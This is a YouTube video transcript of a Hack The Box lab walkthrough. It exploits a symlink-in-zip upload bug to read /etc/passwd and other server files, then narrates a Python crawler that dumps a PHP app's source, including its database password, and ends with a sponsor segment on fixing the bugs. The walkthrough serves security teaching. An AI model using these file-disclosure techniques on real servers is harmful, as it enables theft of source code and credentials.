{"text": "what's going on YouTube this is ipsec and today we're going to do something a little bit different and that is do a cliffnote version of a stream I did a couple days ago where we created a python application that would take a file disclosure vulnerability and use that to crawl the website and why would you crawl a website after a file disclosure vulnerability because that's allowing you to extract the website Source in this case it was a PHP app if we just did a standard web crawler we just get the HTML we don't get the source code but this will enable us to get the source code of the app so then we can easily find vulner abilities so this video is going to be a cliff note of everything we did there I'm going to shrink myself and let's go over the actual vulnerability real quick right um in the zipping box for I hack the Box", "start": 0.24, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "there's a file disclosure vulnerability it's a little bit weird the application accept zip files and inside the zip file there's a PDF it only enforces the extension it can be anything um like any type of text and once you upload it it will allow you to access that file right so let's just walk through this real quick I'm going to make a directory called zip and then let's just touch or we can Echo please subscribe to um test.pdf and then we can zip package. zip here so now we have a zip file that just contains um test.pdf and I think that was an unsupported command but that should be fine um apparently I don't know how to use seven zip off the top of my head so if I upload package. 
zip we go here I'm going to curl this and we get Please Subscribe it doesn't display here because the mime type tells my browser it's a PDF I bet", "start": 42.28, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "if I did a-v uh we can see content type there right so that's why my browser isn't displaying it so the vulnerability is you can put a SIM Link in a zip so let's delete everything here and I'm going to create a symbolic link of etsy passwd and I'm going to call it test.pdf if I look at this we have it pointed there now if we do a help on zip there's this Dy and that's going to store the symbolic link so if I just zip this up so I'm going to do zip um package do zip on this file let's make directory called out real quick and we'll unzip it we see it didn't get the SIM link um the contents are my Etsy passwd we can see IPC right there um if we wanted to make it follow the Sim link and again lsla on out lsla here you know it's a Sim link because it's got this Arrow so I'm going to delete everything out of", "start": 104.759, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "out we're going to do that zip command again but specify Dy so now if I go into out we do the same zip command we see zip is telling us it processed a symbolic link if I do it lsla we can see the symbolic link followed right so now if I upload that new package. 
zip. I think I put it... oh no, it's in here. Then we grab this file and we have the /etc/passwd off the server; we know it's off the server because you don't see ippsec near the bottom. So if we wanted to extract a bunch of files this way, it's kind of a pain, right? So in the video I had created a Python application, let me open it up (let's do code .) to automate that. When I created the Python application in the Hack The Box video, I only did it so we could download files one at a time. So this is the file; we have the create_zip function, and this nastiness is just how", "start": 168.72, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "you can add a symlink to a zip. I'm sure there's a cleaner way to do it, but hey, it worked. So we have a way to download files one at a time: I run the script with python3 against /etc/passwd and it works, awesome. But this is a big pain, because we have to guess at a lot of the files. So if I do /var/www/html/index.php we can get it. If you want to know how I knew it was that, we could leak it out of /etc/apache2/sites-enabled, and the default there is 000-default.conf for Apache, which will leak where the document root is. If this was a production server and they were doing virtual host routing, we'd probably want to get every hostname out of /etc/hosts, and normally the file wouldn't be 000-default, it would probably be named after one of the hostnames in that hosts file. But those are ways you could", "start": 239.92, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "get the document root, which is where your script lives. The alternative is that a lot of times you can just use the /proc/self/cwd directory; this also works. We can request /proc/self/cwd and get the file there; that's the current working directory of the current process, and on websites it's normally going to be the web root, so it's a really handy way of just getting to the web root. Now, if I wanted to start downloading the source code, there are a lot of files I'd have to download and a lot of going through them; it's just going to be painful. We'd have to go like index.php, I think there's upload.php, and then we'd read this source code, find a different PHP file, and download that. It's probably going to take hours to download everything, so that's where having a crawler comes in", "start": 302.639, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "handy. I created this pwnclosure on stream, and we'll go over the code in a minute, but I want to just run it real quick so you can see the benefit, and then we'll talk about the code and then end the video. So I'm going to run pwnclosure and it's just going to start downloading everything. See, we had it crawl; it found links off index.php and starts
downloading them. And if I go into the output directory, we got proc/self/cwd; I probably shouldn't have logged all of that, but hey, we have the files, we have the entire web source of this application, at least I think I grabbed every file. What this enables us to do is just open up Visual Studio Code on the web root, and that allows us to access the application just as if we did a git pull or something", "start": 351.72, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "right, we just have all the source code at our fingertips, even all the CSS and JavaScript if we wanted it, and we could just run the application ourselves if we had the database up and running; we see the database config here, we get the MySQL password. But what's really cool when you download this is: we just did the file disclosure vulnerability, we downloaded the web source, and we have the Snyk plugin installed in Visual Studio Code, so it's going to go and scan our code and tell us where the vulnerabilities are. And Snyk is today's video sponsor. If you didn't know what Snyk is, it's a platform that will scan your code, dependencies, and containers, all in real time, to help you find and fix vulnerabilities. We have the open source security scanner, which isn't going to work for this", "start": 406.759, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "application because it's just vanilla PHP; if it was something like Laravel, or Python with a requirements.txt, it would be able to scan all those files for vulnerabilities. You have some code quality things it's going to point out, like in jQuery, how we can fix it and make the code a little more readable; it always gives some recommendations on how to fix things. So let's go to the cool stuff, the vulnerabilities. If we go to product.php there's a SQL injection right here. We can see we're doing a prepared statement, but we just passed the parameter in here instead of doing it the correct way. I know I talked about it in my Hack The Box video, but I want to say you'd put a question mark and then bind ID like this. Because it wasn't done that way, it discovers it is vulnerable. What", "start": 453.84, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "if I save this, will it automatically find that this file is no longer vulnerable? That's the one thing I really like about it: once we do it, it says, oh, you fixed that function, no more vulnerabilities, awesome. Let's go to index.php; there's a file inclusion, so let's fix the path traversal vulnerability. In this one it's talking about the rename functionality right here, and it tells us all the lines where it became user input; so if we look here, line 54, that is highlighted here. If we look at how it wants us to fix it, it probably wants us to use the basename function, so let's go up here where we first declare the file name and I'll just wrap it in basename, put that there, and it'll automatically rescan the code and we no longer see the file disclosure vulnerability, or the path traversal as", "start": 502.12, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "they called it. Right, so that is Snyk
in a nutshell. I'd highly recommend checking it out if you haven't seen it before; go to snyk.io. This is a referral link, and the best way to support me is going there, signing up to the platform, and trying it out. I definitely do love it; I don't do sponsors here that often, so you know I really enjoy the product when I give it a shout-out. So let's now go into how pwnclosure works. I'm trying to think of a good way to do this, so we'll start down here: I do an import fd, and then we call start_crawl and pass in a function to a function. This is something I don't do that often, but here where we do start_crawl we can pass in this function, and what that enables us to do is easily swap out the file disclosure vulnerability. This one I had file", "start": 562.56, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "disclosure in a zip, but for a different one I just have to create a function that performs the file disclosure vulnerability and gives the output as text, and then I swap this function out and we're good to go; it'll start crawling. So I tried to make this so we need as minimal changes as possible to adapt it to other web applications. If I get bored enough, or there are a lot of requests, we can extend it to different languages; right now it's just a PHP thing. So let's go into how this works. First off we're setting a variable: this is a set, and sets are very much like a list. This is where a lot of the debugging on stream came in; the main difference here is a set will not allow a duplicate, and we had a lot of duplicate file downloads that we were trying to troubleshoot. At the end of the", "start": 616.76, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "day I just made everything a set so duplicates couldn't be added. We declare crawled right at the start; because this is recursive, we don't want to crawl the same page twice, so whenever we crawl a page we add it to the set. The queue is going to be all the files we want to download; it starts off with just that one file we specified, index.php, but then it finds links in index.php and goes and downloads them. So while we have data in our queue, we take the first item off, delete it, and assign it to this variable, and we say we're downloading this page. Then we add it to crawled, so we know we have downloaded the page, we assign the full path, and then we call the function that we passed in; that's going to be this", "start": 665.839, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "download file function, specifying the full path. Then we save it, and after that we call get_links. If you want to look at save, all it does is open up output in the directory, make the directory, and write it; nothing fancy there. What the next function, get_links, is going to do is find all the links on the page. We're looking for something that begins with href=, src=, or include followed by a space, then we're looking for a quote, and then this is going to be our file name: we accept numbers, letters, a hyphen, an underscore, a slash, and a period, and we go until one of those characters doesn't match, and that's it. It grabs the match because it's in these parentheses, so that is the regular expression. Here it's going to add the link, and if a period isn't found", "start": 714.839, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website
Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "the reason why that one was there is because there was a directory um that would just just say hre equals shop I want to say it was let's go to index. uh PHP here let's just do shop so this link was just pointing us to the shop directory now Apache automically appended index.php for us but because with the file disclosure vulnerability we don't have Apache helping us out that much so we had to specify index.php so if there isn't a um extension on the file it just assumes it's a directory and goes ahead and makes index.php so that's what that is doing so we add the link and then there was something slightly different if we go to this page this is where a um different vulnerability lies let's see if we go to the shop and click on it we have this page variable and that's going to load product.php so if I go to like", "start": 774.0, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "product.php it pulls it up so that next drag X is going to look for page equals and then the name and because we know the web service appending PHP it's going to um do that for us if it finds a page that doesn't have an extension it's just going to append PHP unlike before where it appended SL index.php this just does.", "start": 837.639, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "PHP because we have the file name and then we return all the links that it found so we called get links now we're going to go through each link if we have a slash on the beginning of the link we're just going to remove it because we don't want it and that could create a lot of duplicates and we can go into some weird Loop where we just keep 
getting another slash I saw once when we like got slash stop then we got oh man that's annoying uh we go we got SL static method and it just kept going down this Loop of keep doing another slash so I just said you know what we're going to kill the slashes we'll do an L strip um then we're looking for if slash is in page and if it is that means we were in a directory when we hit it so that would mean we were in shop like we're in this index.php the page has shop index.php it", "start": 860.199, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "found functions.php so we didn't want to just save functions.php we wanted to save shopf functions.php so that's why we Preen the um directory there if it ends with two periods we just continue because that was a weird case I don't know exactly what happened there but we never want to get to dot dots right we could probably even do like contains dot dot or something we don't need ends with um and then we have finally the link is not in the crawled set let's go ahead and add it to our queue um and I have a debug statement here if we wanted to debug it but that is the script so hope you guys enjoyed it definitely big shout out to sneak for sponsoring this video take care and I will see you all next time", "start": 912.36, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}}
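Editor's note: the stream's create_zip code is described but not shown in this transcript, so here is a minimal sketch of the symlink-in-a-zip trick from the walkthrough. The function name make_symlink_zip is an assumption, not the video's code; the key point is that Python's zipfile module has no symlink helper, so you mark the entry as a symlink yourself via the Unix mode bits in external_attr, and the entry's stored bytes are just the link target path.

```python
import zipfile

def make_symlink_zip(zip_path, link_name, target):
    """Create a zip whose single entry is a symlink named link_name.

    A server that extracts this archive and later serves link_name will
    actually return the contents of target (e.g. /etc/passwd), which is
    the file disclosure primitive used throughout the video.
    """
    with zipfile.ZipFile(zip_path, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        # The upper 16 bits of external_attr hold the Unix mode;
        # 0o120777 is S_IFLNK | 0777, i.e. "this entry is a symlink".
        info.external_attr = 0o120777 << 16
        info.create_system = 3  # 3 = Unix, so extractors honor the mode bits
        # For a symlink entry, the stored data is the link target path.
        zf.writestr(info, target)

# Roughly equivalent to: ln -s /etc/passwd test.pdf && zip -y package.zip test.pdf
make_symlink_zip("package.zip", "test.pdf", "/etc/passwd")
```

Uploading the resulting package.zip and requesting test.pdf should then return the server's /etc/passwd, assuming the target extracts archives with symlinks preserved, as the box in the video did.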
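Editor's note: the crawl loop described in the transcript (a crawled set, a queue seeded with index.php, one regex for href=/src=/include links and another for page= parameters, leading slashes stripped, the current directory prepended, dot-dots skipped) can be approximated as below. This is a reconstruction under assumptions, not the actual pwnclosure source: the regexes, the fetch callable standing in for the pluggable file disclosure function, and the prefix handling are all simplified.

```python
import re
from collections import deque

# Approximations of the regexes described in the video: href=/src=/include
# references, plus ?page= parameters that the app routes to <name>.php.
LINK_RE = re.compile(r'(?:href=|src=|include )["\']([\w\-/.]+)')
PAGE_RE = re.compile(r'page=([\w\-]+)')

def crawl(start_page, fetch):
    """Breadth-first crawl of PHP source via a pluggable disclosure primitive.

    fetch(path) is whatever file disclosure trick you have; it only needs to
    return the raw source of path as text. crawled is a set, so no page is
    ever downloaded twice even if many pages link to it.
    """
    crawled = set()
    queue = deque([start_page])
    sources = {}
    while queue:
        page = queue.popleft()
        if page in crawled:
            continue
        crawled.add(page)
        text = fetch(page)
        sources[page] = text
        # Bare directory links get /index.php; bare ?page= names get .php.
        links = [l if "." in l else l + "/index.php"
                 for l in LINK_RE.findall(text)]
        links += [p + ".php" for p in PAGE_RE.findall(text)]
        prefix = page.rsplit("/", 1)[0] + "/" if "/" in page else ""
        for link in links:
            link = link.lstrip("/")       # kill leading slashes (dupe loops)
            if "/" not in link:
                link = prefix + link      # relative link inside a subdirectory
            if link.endswith("..") or link in crawled:
                continue
            queue.append(link)
    return sources
```

In practice fetch would be the symlink-upload-and-download routine; swapping in a different disclosure bug only means swapping that one callable, which is the design point made in the video.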